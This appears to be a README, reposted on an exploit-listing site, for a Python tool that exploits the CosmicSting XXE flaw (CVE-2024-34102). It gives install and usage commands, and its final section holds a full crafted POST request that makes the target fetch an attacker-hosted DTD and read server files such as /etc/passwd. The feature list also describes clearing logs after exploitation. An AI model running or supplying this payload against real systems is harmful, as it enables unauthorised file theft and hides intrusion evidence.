Share
## https://sploitus.com/exploit?id=6320F5A1-38C8-5459-83CC-85FC8857B606
# CosmicSting CVE-2024-34102 Exploit

## Overview
CosmicSting is a Python script designed to exploit an XML External Entity (XXE) vulnerability (CVE-2024-34102) that could potentially lead to arbitrary code execution. This script demonstrates how an attacker could exploit such vulnerabilities to read sensitive files from a server using XML-based requests.

## Features
- Exploits an XXE vulnerability to execute malicious requests.
- Generates a callback URL for hosting a DTD file.
- Uses multi-threading for faster exploitation.
- Clears and removes instance logs on the SSRF API after exploitation.

## Requirements
- Python 3.x
- Dependencies:
  - `requests`
  - `click`
  - `fake_useragent`

## Installation
1. Clone the repository:
   ```bash
   git clone https://github.com/bughuntar/CVE-2024-34102-Python
   cd CVE-2024-34102-Python
   ```

2. Install dependencies using `pip`:
   ```bash
    pip install -r requirements.txt
    chmod +x *
   ```
## Usage
Run the script with the required URL parameter and optional file parameter:
```bash
python cosmic_sting.py --url <target_url> [--file <file_to_read>] [-t <threads>]
```

## Options:
- `-u, --url`: Specifies the URL or domain for vulnerability detection. This option is required.
- `-f, --file`: Allows specifying the file to read from the server. Defaults to `/etc/passwd` if not provided explicitly.
- `-t, --threads`: Specifies the number of concurrent threads to use for exploitation. Defaults to `5`.

## Example
Exploit a vulnerable URL:
```bash
python cosmic_sting.py --url https://example.com --file /etc/hosts -t 10
```

## Crafted XML DTD file POST request:
```
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
```

## Acknowledgements
This script is created by Professor the Hunter for educational purposes. Use it responsibly and only on systems you own or have permission to test.